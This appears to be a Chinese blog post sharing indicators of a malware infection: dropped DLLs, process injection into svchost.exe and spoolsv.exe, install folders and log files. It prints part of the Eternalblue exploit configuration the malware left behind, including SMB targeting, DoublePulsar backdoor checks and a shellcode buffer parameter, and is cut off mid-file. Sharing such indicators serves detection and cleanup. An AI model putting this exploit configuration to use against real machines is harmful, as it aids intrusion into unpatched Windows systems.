勒索病毒与大家分享tpmagentservice.dll和TrustedHostServeces.exe

最新推荐文章于 2022-10-30 09:27:04 发布

wohaorende

最新推荐文章于 2022-10-30 09:27:04 发布

阅读量1.3w

点赞数

文章标签： tpmagentservice.dll TrustedHostServeces.exe spoolsv.exe svchost.exe Doublepulsar

本文链接：https://blog.csdn.net/wohaorende/article/details/79181373

版权

该博客详细介绍了勒索病毒如何利用tpmagentservice.dll和TrustedHostServeces.exe这两个组件，通过svchost.exe和spoolsv.exe系统进程进行恶意注入。病毒活动主要集中在C:windowsSecureBootThemesMicrosoft及C:windowsSystem32SecureBootThemes目录下，并创建svchost.xml和spoolsv.xml配置文件，以及stage2.txt日志文件。

摘要由CSDN通过智能技术生成

有大约56个DLL文件。通过svchost.exe和spoolsv.exe，注入到系统进程。

会在

C:\windows\SecureBootThemes\Microsoft

C:\windows\System32\SecureBootThemes

俩文件夹下面。

通常有两个配置文件。svchost.xml和spoolsv.xml，日志文件为stage2.txt

这是第一个svchost.xml

<t:config xmlns:t="urn:trch" id="0f38f55b6a88feccfb846d3d10ab4687e652e63e" configversion="2.2.0.0" name="Eternalblue" version="2.2.0" schemaversion="2.1.0">
<t:inputparameters>
<t:parameter name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port" type="TcpPort" format="Scalar" hidden="true" valid="true">
<t:default>0</t:default>
<t:value>0</t:value>
</t:parameter>
<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<t:default>60</t:default>
<t:value>60</t:value>
</t:parameter>
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<t:value>%s</t:value>
</t:parameter>
<t:parameter name="TargetPort" description="Port used by the SMB service for exploit connection" type="TcpPort" format="Scalar" valid="true">
<t:default>445</t:default>
<t:value>445</t:value>
</t:parameter>
<t:parameter name="VerifyTarget" description="Validate the SMB string from target against the target selected before exploitation." type="Boolean" format="Scalar" valid="true">
<t:default>true</t:default>
<t:value>true</t:value>
</t:parameter>
<t:parameter name="VerifyBackdoor" description="Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts." type="Boolean" format="Scalar" valid="true">
<t:default>true</t:default>
<t:value>true</t:value>
</t:parameter>
<t:parameter name="MaxExploitAttempts" description="Number of times to attempt the exploit and groom. Disabled for XP/2K3." type="U32" format="Scalar" valid="true">
<t:default>3</t:default>
<t:value>3</t:value>
</t:parameter>
<t:parameter name="GroomAllocations" description="Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do." type="U32" format="Scalar" valid="true">
<t:default>12</t:default>
<t:value>12</t:value>
</t:parameter>
<t:parameter name="ShellcodeBuffer" description="Shellcode buffer in hex (hint: use 'F:<FILENAME>' to load from file)" type="Buffer" format="Scalar" hidden="true" required="false"></t:parameter>
<t:paramchoice name="Target" description="Operati